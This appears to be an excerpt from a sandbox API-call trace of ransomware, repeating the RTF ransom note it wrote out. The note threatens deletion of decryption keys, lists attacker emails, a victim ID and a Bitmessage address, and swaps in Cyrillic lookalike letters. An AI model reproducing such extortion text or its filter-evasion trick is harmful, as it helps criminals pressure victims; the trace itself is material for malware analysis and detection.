ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.553] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.553] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think 